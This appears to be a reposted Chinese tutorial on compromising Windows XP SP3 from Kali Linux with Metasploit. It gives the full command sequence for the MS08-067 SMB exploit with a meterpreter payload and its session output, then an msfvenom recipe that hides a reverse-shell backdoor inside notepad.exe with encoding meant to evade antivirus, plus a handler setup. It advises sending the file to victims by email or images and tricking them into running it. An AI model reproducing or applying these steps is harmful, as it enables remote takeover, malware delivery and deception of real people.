kail入侵xp實例


Kali的IP地址是192.168.0.112

Windows XP的IP地址是192.168.0.108

本文演示怎么使用Metasploit入侵windows xp sp3。

啟動msfconsole:

# msfconsole

選擇一個漏洞:

msf > search platform: windows xp sp3

exploit/windows/smb/ms08_067_netapi是08年發現的漏洞,等級Great。

查看某個漏洞的詳細信息;包含使用方法、支持的平台等等,非常有幫助:

msf > info exploit/windows/smb/ms08_067_netapi

依次執行如下命令:

msf > use exploit/windows/smb/ms08_067_netapi

> set payload windows/meterpreter/bind_tcp

> set RHOST 192.168.0.108 (設置目標主機IP地址)

> exploit

如果目標主機有這個漏洞的話,你就可以控制它了;如果沒有,嘗試使用其他漏洞。

[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese

[*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)

[*] Attempting to trigger the vulnerability... [*] Sending stage (751104 bytes) to 192.168.0.108

[*] Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32

meterpreter >

現在你就可以控制目標主機了,可以截屏、錄音、視頻、下載文件、殺進程等等;使用help查看可以執行的命令。

 

演示使用后門程序侵入Windows

原理:在Kali Linux上生成后門程序,然后把它發送給受害者,欺騙受害者運行(使用郵件、圖片等等)。難點是需要過殺毒軟件和防火牆。

生成后門程序:

我把后門程序隱藏到記事本程序中:notepad.exe

查看Kali Linux的IP:ifconfig(192.168.0.112)

創建后門程序,my_backdoor.exe:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe > my_backdoor.exe

上面命令使用加密試圖躲過殺毒軟件,但是,不要期望它可以生效。使用man msfvenom查看幫助。

把它發送到Windows系統,並運行;如果不能運行換用其他加密方式。

啟動msfconsole:

# msfconsole

use exploit/multi/handler

set LHOST 192.168.0.112

set LPORT 4445

set payload windows/meterpreter/reverse_tcp

show options

exploit

等待受害者啟動后門程序。

OK,入侵成功。

Windows服務器系統包括一個全面、集成的基礎結構,旨在滿足開發人員和信息技術(IT)專業人員的要求。此系統設計用於運行特定的程序和解決方案,借助這些程序和解決方案,信息工作人員可以快速便捷地獲取、分析和共享信息。入侵者對Windows服務器系統的攻擊主要是針對IIS服務器和組網協議的攻擊。

 

                                                  入侵Windows服務器的流程


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM